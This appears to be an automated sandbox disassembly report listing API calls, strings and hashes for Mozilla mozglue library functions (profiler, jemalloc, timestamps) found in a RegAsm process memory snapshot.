                                                                            • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6CC7F8F9
                                                                              • Part of subcall function 6CC46390: GetCurrentThreadId.KERNEL32 ref: 6CC463D0
                                                                              • Part of subcall function 6CC46390: AcquireSRWLockExclusive.KERNEL32 ref: 6CC463DF
                                                                              • Part of subcall function 6CC46390: ReleaseSRWLockExclusive.KERNEL32 ref: 6CC4640E
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F93A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F98A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F990
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F994
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F716
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                              • Part of subcall function 6CC3B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6CC3B5E0
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F739
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F746
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F793
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6CCB385B,00000002,?,?,?,?,?), ref: 6CC7F829
                                                                            • free.MOZGLUE(?,?,00000000,?), ref: 6CC7F84C
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6CC7F866
                                                                            • free.MOZGLUE(?), ref: 6CC7FA0C
                                                                              • Part of subcall function 6CC45E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC455E1), ref: 6CC45E8C
                                                                              • Part of subcall function 6CC45E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC45E9D
                                                                              • Part of subcall function 6CC45E60: GetCurrentThreadId.KERNEL32 ref: 6CC45EAB
                                                                              • Part of subcall function 6CC45E60: GetCurrentThreadId.KERNEL32 ref: 6CC45EB8
                                                                              • Part of subcall function 6CC45E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC45ECF
                                                                              • Part of subcall function 6CC45E60: moz_xmalloc.MOZGLUE(00000024), ref: 6CC45F27
                                                                              • Part of subcall function 6CC45E60: moz_xmalloc.MOZGLUE(00000004), ref: 6CC45F47
                                                                              • Part of subcall function 6CC45E60: GetCurrentProcess.KERNEL32 ref: 6CC45F53
                                                                              • Part of subcall function 6CC45E60: GetCurrentThread.KERNEL32 ref: 6CC45F5C
                                                                              • Part of subcall function 6CC45E60: GetCurrentProcess.KERNEL32 ref: 6CC45F66
                                                                              • Part of subcall function 6CC45E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CC45F7E
                                                                            • free.MOZGLUE(?), ref: 6CC7F9C5
                                                                            • free.MOZGLUE(?), ref: 6CC7F9DA
                                                                            Strings
                                                                            • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6CC7F9A6
                                                                            • " attempted to re-register as ", xrefs: 6CC7F858
                                                                            • Thread , xrefs: 6CC7F789
                                                                            • [D %d/%d] profiler_register_thread(%s), xrefs: 6CC7F71F
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                            • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                            • API String ID: 882766088-1834255612
                                                                            • Opcode ID: c66a9351c0306b8c0f8c4c1117e93bd22392f4005b919855b4b4c0a71354169d
                                                                            • Instruction ID: ef62768611038c41c543cf344f1f53f6099619e0f22c236f2ac275540298683b
                                                                            • Opcode Fuzzy Hash: c66a9351c0306b8c0f8c4c1117e93bd22392f4005b919855b4b4c0a71354169d
                                                                            • Instruction Fuzzy Hash: 3D8113756046009FDB21DF64C880AAEB7B5FF85308F45852DE8499BB51FB31E849CBA2
                                                                            APIs
                                                                            • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6CC44196
                                                                            • memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6CC441F1
                                                                            • VerSetConditionMask.NTDLL ref: 6CC44223
                                                                            • VerSetConditionMask.NTDLL ref: 6CC4422A
                                                                            • VerSetConditionMask.NTDLL ref: 6CC44231
                                                                            • VerSetConditionMask.NTDLL ref: 6CC44238
                                                                            • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CC44245
                                                                            • LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6CC44263
                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6CC4427A
                                                                            • FreeLibrary.KERNEL32(?), ref: 6CC44299
                                                                            • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CC442C4
                                                                            • VerSetConditionMask.NTDLL ref: 6CC442F6
                                                                            • VerSetConditionMask.NTDLL ref: 6CC44302
                                                                            • VerSetConditionMask.NTDLL ref: 6CC44309
                                                                            • VerSetConditionMask.NTDLL ref: 6CC44310
                                                                            • VerSetConditionMask.NTDLL ref: 6CC44317
                                                                            • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CC44324
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
                                                                            • String ID: SetProcessDpiAwareness$Shcore.dll
                                                                            • API String ID: 3038791930-999387375
                                                                            • Opcode ID: 9a54b90918df0b6717ae368c4e16397bd3c35999c1caa8097a8d3e89c9a4abf2
                                                                            • Instruction ID: 8989e7832bf2b970179ef2b4b42e176b9d85b1e639f600e84a4992e028176c8b
                                                                            • Opcode Fuzzy Hash: 9a54b90918df0b6717ae368c4e16397bd3c35999c1caa8097a8d3e89c9a4abf2
                                                                            • Instruction Fuzzy Hash: C851E371B402156BEB20AFB5CC48BAA77BCEF86B14F118558F905A76C0EB74DD40CBA0
                                                                            APIs
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EE60
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EE6D
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EE92
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC7EEA5
                                                                            • CloseHandle.KERNEL32(?), ref: 6CC7EEB4
                                                                            • free.MOZGLUE(00000000), ref: 6CC7EEBB
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EEC7
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7EECF
                                                                              • Part of subcall function 6CC7DE60: GetCurrentThreadId.KERNEL32 ref: 6CC7DE73
                                                                              • Part of subcall function 6CC7DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CC44A68), ref: 6CC7DE7B
                                                                              • Part of subcall function 6CC7DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CC44A68), ref: 6CC7DEB8
                                                                              • Part of subcall function 6CC7DE60: free.MOZGLUE(00000000,?,6CC44A68), ref: 6CC7DEFE
                                                                              • Part of subcall function 6CC7DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CC7DF38
                                                                              • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                              • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EF1E
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EF2B
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EF59
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EFB0
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EFBD
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7EFE1
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EFF8
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F000
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                            • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC7F02F
                                                                              • Part of subcall function 6CC7F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC7F09B
                                                                              • Part of subcall function 6CC7F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6CC7F0AC
                                                                              • Part of subcall function 6CC7F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6CC7F0BE
                                                                            Strings
                                                                            • [I %d/%d] profiler_pause, xrefs: 6CC7F008
                                                                            • [I %d/%d] profiler_stop, xrefs: 6CC7EED7
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                            • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                            • API String ID: 16519850-1833026159
                                                                            • Opcode ID: 5483e2aab6c3eab869ae772fb9327020999dd2a733a07ac593c55c44745bd969
                                                                            • Instruction ID: 87cc19eaa7ff1862e149d7e13b61f96da5ddd9fa91974ee0a6cb559ff2303005
                                                                            • Opcode Fuzzy Hash: 5483e2aab6c3eab869ae772fb9327020999dd2a733a07ac593c55c44745bd969
                                                                            • Instruction Fuzzy Hash: FE51363E6002209FDB105BE9D8587AAB7B4EB47328F14052AF91583F41FB754804CBBA
                                                                            APIs
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBE804), ref: 6CC6D047
                                                                            • GetSystemInfo.KERNEL32(?), ref: 6CC6D093
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC6D0A6
                                                                            • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6CCBE810,00000040), ref: 6CC6D0D0
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBE7B8,00001388), ref: 6CC6D147
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBE744,00001388), ref: 6CC6D162
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBE784,00001388), ref: 6CC6D18D
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBE7DC,00001388), ref: 6CC6D1B1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
                                                                            • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
                                                                            • API String ID: 2957312145-326518326
                                                                            • Opcode ID: 2e8aafadb6554c9b257a7ac61c0ee5870f99878bc684381d5172db8926274143
                                                                            • Instruction ID: c50c1e093bbb7c57f3f528629ea322eb351c608e084e2fffade4dd2aab1bc9e8
                                                                            • Opcode Fuzzy Hash: 2e8aafadb6554c9b257a7ac61c0ee5870f99878bc684381d5172db8926274143
                                                                            • Instruction Fuzzy Hash: 4581D170B042109BEB009FEADA94B6937B4FB46B04F2405AEE901E7F80F7759805CBD9
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7FADC
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7FAE9
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7FB31
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7FB43
                                                                            • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6CC7FBF6
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7FC50
                                                                            Strings
                                                                            • [I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6CC7FD15
                                                                            • [D %d/%d] profiler_unregister_thread: %s, xrefs: 6CC7FC94
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
                                                                            • String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered
                                                                            • API String ID: 2101194506-3679350629
                                                                            • Opcode ID: c67b009fcc7ef0ca7a60793078063a90ac4d6967bea74b28e87266df6164a36f
                                                                            • Instruction ID: f0f123e6eaaf4642fa327aac64b96fc3142f8f51e3346d77a6f10b3431b504db
                                                                            • Opcode Fuzzy Hash: c67b009fcc7ef0ca7a60793078063a90ac4d6967bea74b28e87266df6164a36f
                                                                            • Instruction Fuzzy Hash: B371F075A04700CFD720DF69C494B6AB7F1FF8A348F11856AE84587B61FB30A805CBA6
                                                                            APIs
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC45E9D
                                                                              • Part of subcall function 6CC55B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CC556EE,?,00000001), ref: 6CC55B85
                                                                              • Part of subcall function 6CC55B50: EnterCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55B90
                                                                              • Part of subcall function 6CC55B50: LeaveCriticalSection.KERNEL32(6CCBF688,?,?,?,6CC556EE,?,00000001), ref: 6CC55BD8
                                                                              • Part of subcall function 6CC55B50: GetTickCount64.KERNEL32 ref: 6CC55BE4
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC45EAB
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC45EB8
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC45ECF
                                                                            • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6CC46017
                                                                              • Part of subcall function 6CC34310: moz_xmalloc.MOZGLUE(00000010,?,6CC342D2), ref: 6CC3436A
                                                                              • Part of subcall function 6CC34310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6CC342D2), ref: 6CC34387
                                                                            • moz_xmalloc.MOZGLUE(00000004), ref: 6CC45F47
                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC45F53
                                                                            • GetCurrentThread.KERNEL32 ref: 6CC45F5C
                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC45F66
                                                                            • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CC45F7E
                                                                            • moz_xmalloc.MOZGLUE(00000024), ref: 6CC45F27
                                                                              • Part of subcall function 6CC4CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC4CAA2
                                                                            • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC455E1), ref: 6CC45E8C
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC455E1), ref: 6CC4605D
                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CC455E1), ref: 6CC460CC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                            • String ID: GeckoMain
                                                                            • API String ID: 3711609982-966795396
                                                                            • Opcode ID: 17fa1146c72fb257d794f7379d2c5853f9092ce3f40034b6055d3b60330c6798
                                                                            • Instruction ID: 6814ab0d17035f7502bb5e2369cd3f8a2c49e669ea72b582e3892990ab10bded
                                                                            • Opcode Fuzzy Hash: 17fa1146c72fb257d794f7379d2c5853f9092ce3f40034b6055d3b60330c6798
                                                                            • Instruction Fuzzy Hash: C571E4B46057409FD700DF69C4C0A6ABBF0FF49304F54896DE48687B52EB31E849CB96
                                                                            APIs
                                                                              • Part of subcall function 6CC331C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6CC33217
                                                                              • Part of subcall function 6CC331C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6CC33236
                                                                              • Part of subcall function 6CC331C0: FreeLibrary.KERNEL32 ref: 6CC3324B
                                                                              • Part of subcall function 6CC331C0: __Init_thread_footer.LIBCMT ref: 6CC33260
                                                                              • Part of subcall function 6CC331C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6CC3327F
                                                                              • Part of subcall function 6CC331C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC3328E
                                                                              • Part of subcall function 6CC331C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC332AB
                                                                              • Part of subcall function 6CC331C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC332D1
                                                                              • Part of subcall function 6CC331C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC332E5
                                                                              • Part of subcall function 6CC331C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CC332F7
                                                                            • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CC49675
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC49697
                                                                            • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CC496E8
                                                                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CC49707
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC4971F
                                                                            • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC49773
                                                                            • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CC497B7
                                                                            • FreeLibrary.KERNEL32 ref: 6CC497D0
                                                                            • FreeLibrary.KERNEL32 ref: 6CC497EB
                                                                            • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC49824
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                            • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                            • API String ID: 3361784254-3880535382
                                                                            • Opcode ID: 601137733288f0fa58f6143d9ae7cfdac585fd86eaf83e346e16b5998d57d83c
                                                                            • Instruction ID: 3f3e73885fe08f87aa6b912e3173862560fb48af3337b011478d0ee50b2c5c42
                                                                            • Opcode Fuzzy Hash: 601137733288f0fa58f6143d9ae7cfdac585fd86eaf83e346e16b5998d57d83c
                                                                            • Instruction Fuzzy Hash: D261F3796002119FDF00CFE9DA88B9A3BB8EB4A314F10C569F915A3B80E730E944CB95
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6CCBE768,?,00003000,00000004), ref: 6CC33AC5
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE768,?,00003000,00000004), ref: 6CC33AE5
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 6CC33AFB
                                                                            • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6CC33B57
                                                                            • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC33B81
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC33BA3
                                                                            • EnterCriticalSection.KERNEL32(6CCBE7B8), ref: 6CC33BAE
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE7B8), ref: 6CC33C74
                                                                            • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC33C8B
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC33C9F
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE7B8), ref: 6CC33D5C
                                                                            • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC33D67
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC33D8A
                                                                              • Part of subcall function 6CC70D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6CC33DEF), ref: 6CC70D71
                                                                              • Part of subcall function 6CC70D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6CC33DEF), ref: 6CC70D84
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
